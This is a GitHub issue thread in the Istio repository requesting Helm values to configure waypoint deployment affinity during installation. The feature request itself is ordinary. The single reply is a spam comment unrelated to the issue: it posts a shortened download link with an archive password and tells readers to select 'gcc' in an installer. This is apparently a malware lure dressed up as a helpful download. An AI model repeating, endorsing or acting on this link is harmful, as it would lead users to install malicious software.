### ISSUE TITLE
Install: Expose Waypoint Affinity

### ISSUE THREAD

**Issue by danehans** [istio/istio#52883]
**Describe the feature request**

Provide the ability to customize waypoint deployment affinity during installation through Helm values. This approach provides consistency with other components that expose configurable affinity, e.g. Istiod.

**Describe alternatives you've considered**

Manually reconfiguring `cm/static-waypoint-config` with the necessary affinity config.

**Affected product area (please put an X in all that apply)**

[X] Ambient
[ ] Docs
[ ] Dual Stack
[X] Installation
[ ] Networking
[ ] Performance and Scalability
[ ] Extensions and Telemetry
[ ] Security
[ ] Test and Release
[ ] User Experience
[ ] Developer Infrastructure

**Affected features (please put an X in all that apply)**

[ ] Multi Cluster
[ ] Virtual Machine
[ ] Multi Control Plane

**Additional context**

This request is similar to https://github.com/istio/istio/issues/51496.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
